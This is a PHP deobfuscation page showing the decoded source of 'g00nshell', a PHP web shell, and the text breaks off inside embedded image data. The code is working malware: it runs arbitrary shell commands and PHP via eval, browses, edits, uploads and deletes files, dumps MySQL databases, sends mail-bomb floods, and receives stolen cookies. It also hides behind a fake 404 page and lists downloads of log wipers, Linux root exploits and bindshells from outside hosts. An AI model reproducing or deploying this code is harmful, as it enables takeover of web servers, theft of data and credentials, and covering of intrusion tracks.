Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto idNYz; ztjju: function sqllogin() { session_start(); if ($_SESSION["\x69\163\1..
Decoded Output download
<?php
goto idNYz; ztjju: function sqllogin() { session_start(); if ($_SESSION["isloggedin"] == "true") { header("Location: ?act=sql"); } style(); echo "<form method='post' action='?act=sql'>"; echo "User:<br><input type='text' name='un' size='30'><br>\xa"; echo "Password:<br><input type='text' name='pw' size='30'><br>\xa"; echo "Host:<br><input type='text' name='host' size='30' value='localhost'><br>
"; echo "Port:<br><input type='text' name='port' size='30' value='3306'><br>
"; echo "<input type='submit' value='Login'>"; echo "</form>"; die; } goto T0ekR; zSPz2: $version = "1.3 final"; goto mcMx2; ngrYW: $f = $_GET["f"]; goto QhnaF; J6HYv: $contents = $_POST["contents"]; goto WHdb0; ijVzm: function sqlinsert() { style(); $sqlcon = @mysql_connect($_SESSION["sql_host"] . ":" . $_SESSION["sql_port"], $_SESSION["sql_user"], $_SESSION["sql_password"]); mysql_select_db($_GET["db"], $sqlcon); if ($_POST["ins"]) { unset($_POST["ins"]); $fields = array_flip($_POST); $f = implode(",", $fields); $v = implode(",", $_POST); $query = "INSERT INTO " . $_GET["table"] . " (" . $f . ") VALUES (" . $v . ")"; mysql_query($query, $sqlcon) or die(mysql_error()); die("Row inserted.<br>\xa<a href='?act=sql&db=" . $_GET["db"] . "&table=" . $_GET["table"] . "'>Go back</a>"); } $query = "SHOW COLUMNS FROM " . $_GET["table"]; $result = mysql_query($query, $sqlcon) or die(mysql_error()); $i = 0; $fields = array(); echo "<form method='POST'>"; echo "<table>"; while ($row = mysql_fetch_assoc($result)) { array_push($fields, $row["Field"]); echo "<tr><td><b>" . $fields[$i] . "</b><td><input type='text' name='" . $fields[$i] . "'><br>
"; $i++; } echo "</table>"; echo "<br>\xa<input type='submit' value='Insert' name='ins'>"; echo "</form>"; } goto KufTS; AXVDQ: function tools() { global $curdir; style(); $tools = array("--- Log wipers ---" => "1", "Vanish2.tgz" => "http://packetstormsecurity.org/UNIX/penetration/log-wipers/vanish2.tgz", "Cloak.c" => "http://packetstormsecurity.org/UNIX/penetration/log-wipers/cloak.c", "gh0st.sh" => "http://packetstormsecurity.org/UNIX/penetration/log-wipers/gh0st.sh", "--- Priv Escalation ---" => "2", "h00lyshit - Linux 2.6 ALL" => "http://someshit.net/files/xpl/h00lyshit", "k-rad3 - Linux <= 2.6.11" => "http://someshit.net/files/xpl/krad3", "raptor - Linux <= 2.6.17.4" => "http://someshit.net/files/xpl/raptor", "rootbsd - BSD v?" => "http://someshit.net/files/xpl/rootbsd", "--- Bindshells ---" => "3", "THC rwwwshell-1.6.perl" => "http://packetstormsecurity.org/groups/thc/rwwwshell-1.6.perl", "Basic Perl bindshell" => "http://packetstormsecurity.org/groups/synnergy/bindshell-unix", "--- Misc ---" => "4", "MOCKS SOCKS4 Proxy" => "http://superb-east.dl.sourceforge.net/sourceforge/mocks/mocks-0.0.2.tar.gz", "xps.c (proc hider)" => "http://packetstormsecurity.org/groups/shadowpenguin/unix-tools/xps.c"); $names = array_flip($tools); echo "<b>Tools:</b>"; echo "<form method='post'>"; echo "<b>Output Directory</b><br>"; echo "<input type='text' name='loc' size='65' value='" . $curdir . "'><br><br>"; echo "<select name='gf' style='align:center;'>"; foreach ($tools as $tool) { echo "<option value='" . $tool . "'>" . $names[$tool] . "</option>\xa"; } echo "</select>"; echo "<br><input type='submit' value='Grab'>"; echo "</form>"; } goto j0T9v; ZJa2z: function hide() { global $self, $soft, $servip, $servport; die("<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'>
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>\xaThe requested URL {$self} was not found on this server.<P>
<P>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.
<HR>\xa<ADDRESS>{$soft} Server at {$servip} Port {$servport}</ADDRESS>\xa</BODY></HTML>"); } goto BamoG; LmwYc: function files($dir) { style(); global $self, $curdir; if ($dir == '') { $dir = $curdir; } $dirx = explode("/", $dir); $files = array(); $folders = array(); echo "<form method='GET'>"; echo "<input type='text' name='dir' value='" . $dir . "' size='40'>"; echo "<input type='submit' value='Go'>"; echo "</form>"; echo "<h4>File list for "; for ($i = 0; $i < count($dirx); $i++) { $totalpath .= $dirx[$i] . "/"; echo "<a href='?dir=" . $totalpath . "'>{$dirx[$i]}</a>" . "/"; } echo "</h4>"; echo "<table>"; echo "<th>File Name<th>File Size</th>"; if ($handle = opendir($dir)) { while (false != ($link = readdir($handle))) { if (is_dir($dir . "/" . $link)) { $file = array(); if (is_writable($dir . "/" . $link)) { $file["perm"] = "write"; } elseif (is_readable($dir . "/" . $link)) { $file["perm"] = "read"; } else { $file["perm"] = "none"; } switch ($file["perm"]) { case "write": @($file["link"] = "<a href='?dir={$dir}/{$link}'><font color='green'>{$link}</font></a>"); break; case "read": @($file["link"] = "<a href='?dir={$dir}/{$link}'><font color='yellow'>{$link}</font></a>"); break; case "none": @($file["link"] = "<a href='?dir={$dir}/{$link}'><font color='red'>{$link}</font></a>"); break; default: @($file["link"] = "<a href='?dir={$dir}/{$link}'><font color='red'>{$link}</font></a>"); break; } @($file["icon"] = "folder"); if ($_SERVER["QUERY_STRING"]) { $folder = "<img src='?" . $_SERVER["QUERY_STRING"] . "&img=" . $file["icon"] . "'>*" . $file["link"]; } else { $folder = "<img src='?img=" . $file["icon"] . "'>*" . $file["link"]; } array_push($folders, $folder); } else { $file = array(); $ext = strtolower(end(explode(".", $link))); if (!($file["size"] = nicesize(@filesize($dir . "/" . $link)))) { $file["size"] = "0B"; } if (is_writable($dir . "/" . $link)) { $file["perm"] = "write"; } elseif (is_readable($dir . "/" . $link)) { $file["perm"] = "read"; } else { $file["perm"] = "none"; } switch ($file["perm"]) { case "write": @($file["link"] = "<a href='?act=view&f=" . $link . "&dir={$dir}'><font color='green'>{$link}</font></a>"); break; case "read": @($file["link"] = "<a href='?act=view&f=" . $link . "&dir={$dir}'><font color='yellow'>{$link}</font></a>"); break; case "none": @($file["link"] = "<a href='?act=view&f=" . $link . "&dir={$dir}'><font color='red'>{$link}</font></a>"); break; default: @($file["link"] = "<a href='?act=view&f=" . $link . "&dir={$dir}'><font color='red'>{$link}</a></font>"); break; } switch ($ext) { case "exe": case "com": case "jar": case '': $file["icon"] = "binary"; break; case "jpg": case "gif": case "png": case "bmp": $file["icon"] = "image"; break; case "zip": case "tar": case "rar": case "gz": case "cab": case "bz2": case "gzip": $file["icon"] = "compressed"; break; case "txt": case "doc": case "pdf": case "htm": case "html": case "rtf": $file["icon"] = "text"; break; case "wav": case "mp3": case "mp4": case "wma": $file["icon"] = "sound"; break; case "js": case "vbs": case "c": case "h": case "sh": case "pl": case "py": case "php": case "h": $file["icon"] = "script"; break; default: $file["icon"] = "unknown"; break; } if ($_SERVER["QUERY_STRING"]) { $file = "<tr><td><img src='?" . $_SERVER["QUERY_STRING"] . "&img=" . $file["icon"] . "' height='18' width='18'>*" . $file["link"] . "</td><td>" . $file["size"] . "</td></tr>\xa"; } else { $file = "<tr><td><img src='?img=" . $file["icon"] . "' height='18' width='18'>*" . $file["link"] . "<td>" . $file["size"] . "</td></tr>\xa"; } array_push($files, $file); } } foreach ($folders as $folder) { echo "<tr><td>{$folder}</td><td>DIR</td></tr>
"; } foreach ($files as $file) { echo $file; } echo "</table>"; closedir($handle); } } goto L8uF6; QhnaF: $curdir = cleandir(getcwd()); goto FyhAX; rwsQf: function main() { global $self, $servip, $servport, $uname, $soft, $banner, $curuser, $version; style(); $act = array("cmd" => "Command Execute", "files" => "File View", "phpinfo" => "PHP info", "phpexec" => "PHP Execute", "tools" => "Tools", "sqllogin" => "SQL", "email" => "Email", "upload" => "Get Files", "lookup" => "List Domains", "bshell" => "Bindshell", "kill" => "Kill Shell"); $capt = array_flip($act); echo "<form method='GET' name='shell'>"; echo "<b>Host:</b> <span class='inf'>" . $servip . "</span><br>"; echo "<b>Server software:</b> <span class='inf'>" . $soft . "</span><br>"; echo "<b>Uname:</b> <span class='inf'>" . $uname . "</span><br>"; echo "<b>Shell Directory:</b> <span class='inf'>" . getcwd() . "</span><br>"; echo "<div style='display:none' id='info'>"; echo "<b>Current User:</b> <span class='inf'>" . $curuser . "</span><br>"; echo "<b>ID:</b> <span class='inf'>" . @exec("id") . "</span><br>"; if (@ini_get("safe_mode") != '') { echo "<b>Safemode:</b> <font color='red'>ON</font>"; } else { echo "<b>Safemode:</b> <font color='green'>OFF</font>"; } echo "\xa<br>
"; if (@ini_get("open_basedir") != '') { echo "<b>Open Base Dir:</b> <font color='red'>ON</font> [ <span class='inf'>" . ini_get("open_basedir") . "</span> ]"; } else { echo "<b>Open Base Dir:</b> <font color='green'>OFF</font>"; } echo "\xa<br>
"; if (@ini_get("disable_functions") != '') { echo "<b>Disabled functions:</b> " . @ini_get("disable_functions"); } else { echo "<b>Disabled functions:</b> None"; } echo "
<br>\xa"; if (@function_exists(mysql_connect)) { echo "<b>MySQL:</b> <font color='green'>ON</font>"; } else { echo "<b>MySQL:</b> <font color='red'>OFF</font>"; } echo "</div>"; echo "[ <a href='#hax' onClick="document.getElementById('info').style.display = 'block';">More</a> ] "; echo "[ <a href='#hax' onClick="document.getElementById('info').style.display = 'none';">Less</a> ]"; echo "<center>"; echo "<h3 align='center'>Links</h3>"; if ($_SERVER["QUERY_STRING"]) { foreach ($act as $link) { echo "[ <a href='?" . $_SERVER["QUERY_STRING"] . "&act=" . $capt[$link] . "' target='frm'>" . $link . "</a> ] "; } } else { foreach ($act as $link) { echo "[ <a href='?act=" . $capt[$link] . "' target='frm'>" . $link . "</a> ] "; } } echo "</center>"; echo "<hr>"; echo "<br><iframe name='frm' style='width:100%; height:65%; border:0;' src='?act=files'></iframe>"; echo "<pre style='text-align:center'>:: g00nshell <font color='red'>v" . $version . "</font> ::</pre>"; die; } goto iW5_8; u2Hws: $servip = $servinf[0]; goto GCF3q; WLTYy: @set_time_limit(5); goto jMQOw; L8uF6: function email() { $times = $_POST["times"]; $to = $_POST["to"]; $subject = $_POST["subject"]; $body = $_POST["body"]; $from = $_POST["from"]; style(); echo "<h2>Mail Bomber</h2>
<form method='POST' action='?act=email'>
<b>Your address:</b><br>
<input name='from' type='text' size='35'><br>
<b>Their address:</b><br>\xa <input name='to' type='text' size='35'><br>
<b>Subject:</b><br>\xa <input name='subject' type='text' size='35'><br>
<b>Text:</b><br>\xa <input name='body' type='text' size='35'><br>\xa <b>How many times:</b><br>\xa <input name='times' type='text' size='5'><br><br>\xa <input name='submit' type='submit' value='Submit'>
</form>"; if ($to && $from) { for ($i = 0; $i < $times; $i++) { mail("{$to}", "{$subject}", "{$body}", "From: {$from}"); } } } goto EJ_QD; EfjkW: if ($dir && $dir != "nullz") { $dir = cleandir($dir); } goto J6HYv; Kt_Mr: function userauth() { global $user, $pass; header("WWW-Authenticate: Basic realm='Secure Area'"); if (md5($_SERVER["PHP_AUTH_USER"]) != $user || md5($_SERVER["PHP_AUTH_PW"] != $pass)) { hide(); die; } } goto xEa8U; aTjNq: $soft = $_SERVER["SERVER_SOFTWARE"]; goto iHZaI; OwdS2: $cmd = $_GET["cmd"]; goto DEeX_; I0k_1: $IP = array("127.0.0.2", "127.0.0.1"); goto ipa7I; D95q_: $cmd = $_GET["cmd"]; goto ulNOj; cAlhs: $curuser = @exec("whoami"); goto D95q_; BamoG: function style() { global $servip, $version; echo "<html>
<head>
<title>g00nshell v" . $version . " - " . $servip . "</title>
<style>\xa
body { background-color:#000000; color:white; font-family:Verdana; font-size:11px; }\xa\xa h1 { color:white; font-family:Verdana; font-size:11px; }
\xa h3 { color:white; font-family:Verdana; font-size:11px; }\xa
input,textarea,select { color:#FFFFFF; background-color:#2F2F2F; border:1px solid #4F4F4F; font-family:Verdana; font-size:11px; }\xa
textarea { font-family:Courier; font-size:11px; }\xa\xa a { color:#6F6F6F; text-decoration:none; font-family:Verdana; font-size:11px; }
\xa a:hover { color:#7F7F7F; }\xa
td,th { font-size:12px; vertical-align:middle; }\xa\xa th { font-size:13px; }
table { empty-cells:show;}\xa\xa .inf { color:#7F7F7F; }
\xa </style>
\xa </head>\xa"; } goto rwsQf; iHZaI: $servinf = split("[:]", getenv("HTTP_HOST")); goto u2Hws; FyhAX: if (!$dir) { $dir = $_GET["dir"]; } elseif ($dir && $_SESSION["dir"]) { $dir = $_SESSION["dir"]; } elseif ($dir && $_SESSION["dir"]) { $dir = $curdir; } goto EfjkW; Crq7b: $uakey = "b5c3d0b28619de70bf5588505f4061f2"; goto I0k_1; qub4z: function sqldownload() { @ob_flush; $sqlcon = @mysql_connect($_SESSION["sql_host"] . ":" . $_SESSION["sql_port"], $_SESSION["sql_user"], $_SESSION["sql_password"]); mysql_select_db($_GET["db"], $sqlcon); $query = "SHOW COLUMNS FROM " . $_GET["table"]; $result = mysql_query($query, $sqlcon) or die(mysql_error()); $fields = array(); while ($row = mysql_fetch_assoc($result)) { array_push($fields, $row["Field"]); $i++; } $result = mysql_query("SELECT * FROM " . $_GET["table"], $sqlcon) or die(mysql_error()); $num_rows = mysql_num_rows($result) or die(mysql_error()); for ($x = 1; $x < $num_rows; $x++) { $out .= "("; for ($i = 0; $i < count($fields); $i++) { $out .= "'"; $query = "SELECT " . $fields[$i] . " FROM " . $_GET["table"] . " WHERE " . $fields[0] . " = '" . $x . "'"; $dat = mysql_query($query, $sqlcon) or die(mysql_error()); while ($row = mysql_fetch_row($dat)) { if ($row[0] == '') { $row[0] = "NULL"; } if ($i != count($fields) - 1) { $out .= str_replace("\xd
", "\r\n", $row[0]) . "', "; } else { $out .= $row[0] . "'"; } } } $out .= ");\xa"; } $filename = $_GET["table"] . "-" . time() . ".sql"; header("Content-type: application/octet-stream"); header("Content-length: " . strlen($out)); header("Content-disposition: attachment; filename=" . $filename . ";"); echo $out; die; } goto ijVzm; aynIT: function edit($file, $contents) { style(); $handle = fopen($file, "w"); fwrite($handle, $contents); fclose($handle); echo "Saved file.<br><br>"; echo "<a href='?act=files'>Go back</a>"; } goto ZQbAw; xEa8U: if (!$act && !$cmd && !$cookie && !$f && !$dir && !$gf && !$img) { main(); } elseif (!$act && $cmd) { style(); echo "<b>Results:</b>
<br><textarea rows=20 cols=100>"; $cmd = exec($cmd, $result); foreach ($result as $line) { echo $line . "\xa"; } echo "</textarea>"; } elseif ($cookie) { @mail("{$email}", "Cookie Data", "{$cookie}", "From: {$email}"); hide(); } elseif ($act == "view" && $f && $dir) { view($f, $dir); } elseif ($img) { img($img); } elseif ($gf) { grab($gf); } elseif ($dir) { files($dir); } else { switch ($act) { case "phpinfo": phpinfo(); break; case "sql": sql(); break; case "files": files($dir); break; case "email": email(); break; case "cmd": cmd(); break; case "upload": upload(); break; case "tools": tools(); break; case "sqllogin": sqllogin(); break; case "sql": sql(); break; case "lookup": lookup(); break; case "kill": kill(); break; case "phpexec": execphp(); break; default: main(); break; } } goto GtkJ5; AjxcM: function execphp() { style(); echo "<h4>Execute PHP Code</h4>"; echo "<form method='POST'>"; echo "<textarea name='phpexec' rows=5 cols=100>"; if (!$_POST["phpexec"]) { echo "/*Don't include <? ?> tags*/\xa"; } echo htmlentities($_POST["phpexec"]) . "</textarea>
<br>\xa"; echo "<input type='submit' value='Execute'>"; echo "</form>"; if ($_POST["phpexec"]) { echo "<textarea rows=10 cols=100>"; eval(stripslashes($_POST["phpexec"])); echo "</textarea>"; } } goto ztjju; EJ_QD: function view($filename, $dir) { if ($_POST["fileact"] == "Download") { header("Content-type: application/octet-stream"); header("Content-length: " . strlen($_POST["contents"])); header("Content-disposition: attachment; filename=" . basename($filename) . ";"); $handle = fopen($filename, "r"); echo fread($handle, filesize($filename)); die; } style(); if ($_POST["contents"] && $_POST["fileact"] == "Save") { $handle = fopen($filename, "w"); fwrite($handle, stripslashes($_POST["contents"])); fclose($handle); echo "Saved file.<br><br>"; echo "<a href='?act=view&f={$filename}&dir=nullz'>Go back</a>"; die; } elseif ($_POST["fileact"] == "Delete") { unlink($filename); echo "Deleted file.<br><br>"; echo "<a href='?act=files'>Go back</a>"; die; } if ($dir != "nullz") { $filename = $dir . "/" . $filename; } $bad = array("<", ">"); $good = array("<", ">"); $file = fopen($filename, "r"); $content = fread($file, @filesize($filename)); echo "<form name='file' method='POST' action='?act=view&dir={$dir}&f={$filename}'>"; echo "<textarea style='width:100%; height:92%;' name='contents'>"; echo str_replace($bad, $good, $content) . "\xa"; echo "</textarea>"; echo "<input name='fileact' type='submit' value='Save'>"; echo "<input name='fileact' type='submit' value='Delete'>"; echo "<input name='fileact' type='submit' value='Download'>"; echo "</form>"; } goto aynIT; eyRfb: $user = "af1035a85447f5aa9d21570d884b723a"; goto YaNTc; mcMx2: $self = $_SERVER["PHP_SELF"]; goto aTjNq; KufTS: function nicesize($size) { if (!$size) { return false; } if ($size >= 1073741824) { return round($size / 1073741824) . " GB"; } elseif ($size >= 1048576) { return round($size / 1048576) . " MB"; } elseif ($size >= 1024) { return round($size / 1024) . " KB"; } else { return $size . " B"; } } goto LmwYc; GCF3q: $servport = $servinf[1]; goto Re6QC; idNYz: $auth = 0; goto Crq7b; jMQOw: switch ($auth) { case 0: break; case 1: if (md5($_SERVER["HTTP_USER_AGENT"]) != $uakey) { hide(); } break; case 2: if (!in_array($_SERVER["REMOTE_ADDR"], $IP)) { hide(); } break; case 3: if (!$_SERVER["PHP_AUTH_USER"]) { userauth(); } break; } goto Kt_Mr; TNDAO: $img = $_GET["img"]; goto ysBF_; zl_Zn: function up($up) { style(); $updir = $_POST["loc"]; move_uploaded_file($up["tmp_name"], $updir . "/" . $up["name"]); die("File has been uploaded."); } goto a_aHJ; DEeX_: $cookie = $_GET["cookie"]; goto ngrYW; oKKh5: function kill() { style(); echo "<form method='post'>"; echo "Type 'confirm' to kill the shell:<br>
<input type='text' name='ver' action='?act=kill'>"; echo "<input type='submit' value='Delete'>"; echo "</form>"; if ($_POST["ver"] == "confirm") { $self = basename($_SERVER["PHP_SELF"]); if (unlink($self)) { echo "Deleted"; } else { echo "Failed"; } } } goto d1uen; iW5_8: function cmd() { style(); echo "<form name='CMD' method='POST'>"; echo "<b>Command:</b><br>"; echo "<input name='cmd' type='text' size='50'>*"; echo "<select name='precmd'>"; $precmd = array('' => '', "Read /etc/passwd" => "cat /etc/passwd", "Open ports" => "netstat -an", "Running Processes" => "ps -aux", "Uname" => "uname -a", "Get UID" => "id", "Create Junkfile (/tmp/z)" => "dd if=/dev/zero of=/tmp/z bs=1M count=1024", "Find passwd files" => "find / -type f -name passwd"); $capt = array_flip($precmd); foreach ($precmd as $c) { echo "<option value='" . $c . "'>" . $capt[$c] . "\xa"; } echo "</select><br>
"; echo "<input type='submit' value='Execute'>
"; echo "</form>
"; if ($_POST["cmd"] != '') { $x = $_POST["cmd"]; } elseif ($_POST["precmd"] != '') { $x = $_POST["precmd"]; } else { die; } echo "Results: <br><textarea rows=20 cols=100>"; $cmd = @exec($x, $result); foreach ($result as $line) { echo $line . "\xa"; } echo "</textarea>"; } goto AjxcM; GtkJ5: function cleandir($d) { $d = realpath($d); $d = str_replace("\\", "//", $d); $d = str_replace("////", "//", $d); $d = str_replace("\", "/", $d); return $d; } goto ZJa2z; ZQbAw: function upload() { global $curdir; style(); echo "<form name='files' enctype='multipart/form-data' method='POST'>
<b>Output Directory</b><br>
<input type='text' name='loc' size='65' value='" . $curdir . "'><br><br>
<b>Remote Upload</b><br>
<input type='text' name='rem' size='65'>\xa <input type='submit' value='Grab'><br><br>
<b>Local File Upload</b><br>\xa <input name='up' type='file' size='65'>
<input type='submit' value='Upload'>
</form><br>"; if ($_POST["rem"]) { grab($_POST["rem"]); } if ($_FILES["up"]) { up($_FILES["up"]); } } goto zl_Zn; T0ekR: function sql() { session_start(); if (!$_GET["sqlf"]) { style(); } if ($_POST["un"] && $_POST["pw"]) { $_SESSION["sql_user"] = $_POST["un"]; $_SESSION["sql_password"] = $_POST["pw"]; } if ($_POST["host"]) { $_SESSION["sql_host"] = $_POST["host"]; } else { $_SESSION["sql_host"] = "localhost"; } if ($_POST["port"]) { $_SESSION["sql_port"] = $_POST["port"]; } else { $_SESSION["sql_port"] = "3306"; } if ($_SESSION["sql_user"] && $_SESSION["sql_password"]) { if (!($sqlcon = @mysql_connect($_SESSION["sql_host"] . ":" . $_SESSION["sql_port"], $_SESSION["sql_user"], $_SESSION["sql_password"]))) { unset($_SESSION["sql_user"], $_SESSION["sql_password"], $_SESSION["sql_host"], $_SESSION["sql_port"]); echo "Invalid credentials<br>
"; die(sqllogin()); } else { $_SESSION["isloggedin"] = "true"; } } else { die(sqllogin()); } if ($_GET["db"]) { mysql_select_db($_GET["db"], $sqlcon); if ($_GET["sqlquery"]) { $dat = mysql_query($_GET["sqlquery"], $sqlcon) or die(mysql_error()); $num = mysql_num_rows($dat); for ($i = 0; $i < $num; $i++) { echo mysql_result($dat, $i) . "<br>
"; } } else { if ($_GET["table"] && !$_GET["sqlf"]) { echo "<a href='?act=sql&db=" . $_GET["db"] . "&table=" . $_GET["table"] . "&sqlf=ins'>Insert Row</a><br><br>
"; echo "<table border='1'>"; $query = "SHOW COLUMNS FROM " . $_GET["table"]; $result = mysql_query($query, $sqlcon) or die(mysql_error()); $i = 0; $fields = array(); while ($row = mysql_fetch_assoc($result)) { array_push($fields, $row["Field"]); echo "<th>" . $fields[$i]; $i++; } $result = mysql_query("SELECT * FROM " . $_GET["table"], $sqlcon) or die(mysql_error()); $num_rows = mysql_num_rows($result) or die(mysql_error()); $y = 0; for ($x = 1; $x <= $num_rows + 1; $x++) { if (!$_GET["p"]) { $_GET["p"] = 1; } if ($_GET["p"]) { if ($y > 30 * ($_GET["p"] - 1) && $y <= 30 * $_GET["p"]) { echo "<tr>"; for ($i = 0; $i < count($fields); $i++) { $query = "SELECT " . $fields[$i] . " FROM " . $_GET["table"] . " WHERE " . $fields[0] . " = '" . $x . "'"; $dat = mysql_query($query, $sqlcon) or die(mysql_error()); while ($row = mysql_fetch_row($dat)) { echo "<td>" . $row[0] . "</td>"; } } echo "</tr>
"; } } $y++; } echo "</table>
"; for ($z = 1; $z <= ceil($num_rows / 30); $z++) { echo "<a href='?act=sql&db=" . $_GET["db"] . "&table=" . $_GET["table"] . "&p=" . $z . "'>" . $z . "</a> | "; } } elseif ($_GET["table"] && $_GET["sqlf"]) { switch ($_GET["sqlf"]) { case "dl": sqldownload(); break; case "ins": sqlinsert(); break; default: $_GET["sqlf"] = ''; } } else { echo "<table>"; $query = "SHOW TABLES FROM " . $_GET["db"]; $dat = mysql_query($query, $sqlcon) or die(mysql_error()); while ($row = mysql_fetch_row($dat)) { echo "<tr><td><a href='?act=sql&db=" . $_GET["db"] . "&table=" . $row[0] . "'>" . $row[0] . "</a></td><td>[<a href='?act=sql&db=" . $_GET["db"] . "&table=" . $row[0] . "&sqlf=dl'>Download</a>]</td></tr>
"; } echo "</table>"; } } } else { $dbs = mysql_list_dbs($sqlcon); while ($row = mysql_fetch_object($dbs)) { echo "<a href='?act=sql&db=" . $row->Database . "'>" . $row->Database . "</a><br>\xa"; } } mysql_close($sqlcon); } goto qub4z; Re6QC: $uname = php_uname(); goto cAlhs; YaNTc: $pass = "47e331d2b8d07465515c50cb0fad1e5a"; goto zSPz2; WHdb0: $gf = $_POST["gf"]; goto TNDAO; d1uen: die; goto IEiE7; AB80q: function img($img) { $images = array("folder" => "R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAA" . "gALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwq" . "d1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=", "image" => "R0lGODlhFAAWAOMAAP////8zM8z//8zMzJmZmWZmZmYAADMzMwCZzACZMwAzZgAAAAAAAAAAAAAAAAAAACH+TlRoaX" . "MgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1i" . "ZXIgMTk5NQAh+QQBAAACACwAAAAAFAAWAAAEkPDISae4WBzAu99Hdm1eSYYZWXYqOgJBLAcDoNrYNssGsBy/4GsX6y" . "2OyMWQ2OMQngSlBjZLWBM1AFSqkyU4A2tWywUMYt/wlTSIvgYGA/Zq3QwU7mmHvh4g8GUsfAUHCH95NwMHV4SGh4Ed" . "ihOOjy8rZpSVeiV+mYCWHncKo6Sfm5cliAdQrK1PQBlJsrNSEQA7", "unknown" => "R0lGODlhFAAWAMIAAP///8z//5mZmTMzMwAAAAAAAAAAAAAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG" . "9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAABACwAAAAAFAAW" . "AAADaDi6vPEwDECrnSO+aTvPEQcIAmGaIrhR5XmKgMq1LkoMN7ECrjDWp52r0iPpJJ0KjUAq7SxLE+sI+9V8vycFiM" . "0iLb2O80s8JcfVJJTaGYrZYPNby5Ov6WolPD+XDJqAgSQ4EUCGQQEJADs=", "binary" => "R0lGODlhFAAWAMIAAP///8z//8zMzJmZmTMzMwAAAAAAAAAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG" . "9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAABACwAAAAAFAAW" . "AAADaUi6vPEwEECrnSS+WQoQXSEAE6lxXgeopQmha+q1rhTfakHo/HaDnVFo6LMYKYPkoOADim4VJdOWkx2XvirUgq" . "VaVcbuxCn0hKe04znrIV/ROOvaG3+z63OYO6/uiwlKgYJJOxFDh4hTCQA7", "text" => "R0lGODlhFAAWAOMAAP/////MM/8zM8z//5mZmZlmM2bM/zMzMwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH+TlRoaX" . "MgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1i" . "ZXIgMTk5NQAh+QQBAAADACwAAAAAFAAWAAAEb/DISee4eBzAu99Hdm1eSYbZWXEkgI5sEBg0+2HnTBsccvhAmGtXAy" . "COSITwUGg2PYQoQalhOZ/QKLVV6gKmQm8XXDUmzx0yV5ze9s7JdpgtL3ME5jhHTS/xO3hwdWt0f317WwdSi4xRPxlw" . "kUgXEQA7", "compressed" => "R0lGODlhFAAWAOcAAP//////zP//mf//Zv//M///AP/M///MzP/Mmf/MZv/MM//MAP+Z//+ZzP+Zmf+ZZv+ZM/+ZAP" . "9m//9mzP9mmf9mZv9mM/9mAP8z//8zzP8zmf8zZv8zM/8zAP8A//8AzP8Amf8AZv8AM/8AAMz//8z/zMz/mcz/Zsz/" . "M8z/AMzM/8zMzMzMmczMZszMM8zMAMyZ/8yZzMyZmcyZZsyZM8yZAMxm/8xmzMxmmcxmZsxmM8xmAMwz/8wzzMwzmc" . "wzZswzM8wzAMwA/8wAzMwAmcwAZswAM8wAAJn//5n/zJn/mZn/Zpn/M5n/AJnM/5nMzJnMmZnMZpnMM5nMAJmZ/5mZ" . "zJmZmZmZZpmZM5mZAJlm/5lmzJlmmZlmZplmM5lmAJkz/5kzzJkzmZkzZpkzM5kzAJkA/5kAzJkAmZkAZpkAM5kAAG" . "b//2b/zGb/mWb/Zmb/M2b/AGbM/2bMzGbMmWbMZmbMM2bMAGaZ/2aZzGaZmWaZZmaZM2aZAGZm/2ZmzGZmmWZmZmZm" . "M2ZmAGYz/2YzzGYzmWYzZmYzM2YzAGYA/2YAzGYAmWYAZmYAM2YAADP//zP/zDP/mTP/ZjP/MzP/ADPM/zPMzDPMmT" . "PMZjPMMzPMADOZ/zOZzDOZmTOZZjOZMzOZADNm/zNmzDNmmTNmZjNmMzNmADMz/zMzzDMzmTMzZjMzMzMzADMA/zMA" . "zDMAmTMAZjMAMzMAAAD//wD/zAD/mQD/ZgD/MwD/AADM/wDMzADMmQDMZgDMMwDMAACZ/wCZzACZmQCZZgCZMwCZAA" . "Bm/wBmzABmmQBmZgBmMwBmAAAz/wAzzAAzmQAzZgAzMwAzAAAA/wAAzAAAmQAAZgAAM+4AAN0AALsAAKoAAIgAAHcA" . "AFUAAEQAACIAABEAAADuAADdAAC7AACqAACIAAB3AABVAABEAAAiAAARAAAA7gAA3QAAuwAAqgAAiAAAdwAAVQAARA" . "AAIgAAEe7u7t3d3bu7u6qqqoiIiHd3d1VVVURERCIiIhEREQAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMg" . "ZG9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAAkACwAAAAAFA" . "AWAAAImQBJCCTBqmDBgQgTDmQFAABDVgojEmzI0KHEhBUrWrwoMGNDihwnAvjHiqRJjhX/qVz5D+VHAFZiWmmZ8BGH" . "ji9hxqTJ4ZFAmzc1vpxJgkPPn0Y5CP04M6lPEkCN5mxoJelRqFY5TM36NGrPqV67Op0KM6rYnkup/gMq1mdamC1tdn" . "36lijUpwjr0pSoFyUrmTJLhiTBkqXCgAA7", "sound" => "R0lGODlhFAAWAMIAAP////8zM8z//8zMzJmZmWYAADMzMwAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG" . 